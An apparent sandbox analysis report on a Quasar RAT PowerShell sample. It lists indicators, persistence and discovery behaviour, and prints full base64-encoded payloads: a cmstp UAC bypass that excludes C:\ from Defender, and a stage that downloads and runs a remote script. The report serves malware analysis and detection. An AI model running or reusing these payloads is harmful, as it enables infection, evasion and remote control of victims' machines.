quasar | 24fc3c7f746c3a037df97368a44462353b48160e58bb5e2c238280bbd2c9468f

Analysis

max time kernel
113s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 03:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

24fc3c7f746c3a037df97368a44462353b48160e58bb5e2c238280bbd2c9468f.ps1
Size

368KB
MD5

7a0090d72fbfbfa03eb02050e93d2ed7
SHA1

66dc4bb7d8085d1fc894baf3271319a4329971bc
SHA256

24fc3c7f746c3a037df97368a44462353b48160e58bb5e2c238280bbd2c9468f
SHA512

aae5aacaa5d3bce53be878b4ef2f4bfee8a9085e67810f3f9acdea2ec4eb26f28d2caa23a62cf18562dd838cbcca50800992df14de5f5bc07c9d2079da8272c6
SSDEEP

6144:WVLvQRko6c7UCeRYR3XhR1a3Nz1hpMkW3Wggec5kQ39JO9Wejhv:WxQB6c7UfYpD1a3BGRgenQ39DK

Score

10^/10

quasar discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1828-113-0x0000000008880000-0x00000000088DE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	1828	powershell.exe
20	1828	powershell.exe
22	1828	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4948	powershell.exe
1828	powershell.exe
2368	powershell.exe
4068	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	cscript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_357 = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate_357.vbs\""	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
5100	taskkill.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4948	powershell.exe
4948	powershell.exe
2368	powershell.exe
2368	powershell.exe
4068	powershell.exe
4068	powershell.exe
1828	powershell.exe
1828	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeDebugPrivilege	1828	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1828	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 3736	4948	powershell.exe	84
PID 4948 wrote to memory of 3736	4948	powershell.exe	84
PID 3736 wrote to memory of 1260	3736	cscript.exe	88
PID 3736 wrote to memory of 1260	3736	cscript.exe	88
PID 1260 wrote to memory of 3764	1260	cmd.exe	90
PID 1260 wrote to memory of 3764	1260	cmd.exe	90
PID 3764 wrote to memory of 2368	3764	cmd.exe	92
PID 3764 wrote to memory of 2368	3764	cmd.exe	92
PID 2368 wrote to memory of 3204	2368	powershell.exe	95
PID 2368 wrote to memory of 3204	2368	powershell.exe	95
PID 3204 wrote to memory of 1596	3204	csc.exe	96
PID 3204 wrote to memory of 1596	3204	csc.exe	96
PID 2368 wrote to memory of 2728	2368	powershell.exe	97
PID 2368 wrote to memory of 2728	2368	powershell.exe	97
PID 3764 wrote to memory of 1828	3764	cmd.exe	103
PID 3764 wrote to memory of 1828	3764	cmd.exe	103
PID 3764 wrote to memory of 1828	3764	cmd.exe	103

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\24fc3c7f746c3a037df97368a44462353b48160e58bb5e2c238280bbd2c9468f.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" /nologo C:\Users\Admin\AppData\Local\Temp\tmp8B58.vbs
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2368
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vsttqcvn\vsttqcvn.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3204
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91FF.tmp" "c:\Users\Admin\AppData\Local\Temp\vsttqcvn\CSCE6FAF0AF9E8C4DC78038E78F2BB863.TMP"
        7⤵
        
        PID:1596
      - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\2h0ms45b.inf
        6⤵
        
        PID:2728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geXpvaGlkaXhvbWF3YWhmKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnZ2t6djZRL1VIK2c4cVZ5TkhqcHc1M2tEMHE5dkpTYXI3c2FkVjM3MXlEcz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ29pWGk5SzljMkRlaytJMlgvOW5HY3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gbHhzd3N3b3hkcmt3aHFlKCRwYXJhbV92YXIpewlJRVggJyRicmJ5YmlqcnVzZmhxZ25tdXFna3NndmpoPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGtia3F4aGFoa2xpdmNmeGJneWVub3hycWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRxZmFnbXZ3cnJyZ3lieGtmYWd1ZXJza2ppPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJyYnliaWpydXNmaHFnbm11cWdrc2d2amgsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJHFmYWdtdndycnJneWJ4a2ZhZ3VlcnNramkuQ29weVRvKCRrYmtxeGhhaGtsaXZjZnhiZ3llbm94cnFlKTsJJHFmYWdtdndycnJneWJ4a2ZhZ3VlcnNramkuRGlzcG9zZSgpOwkkYnJieWJpanJ1c2ZocWdubXVxZ2tzZ3ZqaC5EaXNwb3NlKCk7CSRrYmtxeGhhaGtsaXZjZnhiZ3llbm94cnFlLkRpc3Bvc2UoKTsJJGtia3F4aGFoa2xpdmNmeGJneWVub3hycWUuVG9BcnJheSgpO31mdW5jdGlvbiBhamVjYWl5eWR3bmZmdG5qdXhtdnB6cmNkKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGlyd3Nta3VsaGJ6YXlxbWRrbnJjZmJ0aW9xd2xueXZyeGFuZXZ6ZT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHZlcHBpZnppZXNuaHhyZ2dneG9kd29peWpnaGR4ZGhpbGp2eHBsa2NvaXJzYXF5enF1PSRsaXJ3c21rdWxoYnpheXFtZGtucmNmYnRpb3F3bG55dnJ4YW5ldnplLkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHZlcHBpZnppZXNuaHhyZ2dneG9kd29peWpnaGR4ZGhpbGp2eHBsa2NvaXJzYXF5enF1LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kbGptdmdzdWFuYnJjbGhsbnBqamZqa3VkciA9ICRlbnY6VVNFUk5BTUU7JGluZnBoYmVydmJuYndlYWJvZ3B6enFnbGIgPSAnQzpcVXNlcnNcJyArICRsam12Z3N1YW5icmNsaGxucGpqZmprdWRyICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaW5mcGhiZXJ2Ym5id2VhYm9ncHp6cWdsYjskamN6Ymg9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRpbmZwaGJlcnZibmJ3ZWFib2dwenpxZ2xiKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWZxIGluICRqY3piaCkgewlpZiAoJHlmcS5TdGFydHNXaXRoKCc6OicpKQl7CQkkc2h0bnk9JHlmcS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZG5sYm1vY21td3JoeG9sYnl2cmd2dW1pdD1bc3RyaW5nW11dJHNodG55LlNwbGl0KCdcJyk7SUVYICckemVncXRxcG9neGt3ZmFmbXZraWdzcWZobj1seHN3c3dveGRya3docWUgKHl6b2hpZGl4b21hd2FoZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkbmxibW9jbW13cmh4b2xieXZyZ3Z1bWl0WzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHhjamluamJjaG5qd3ZzZ2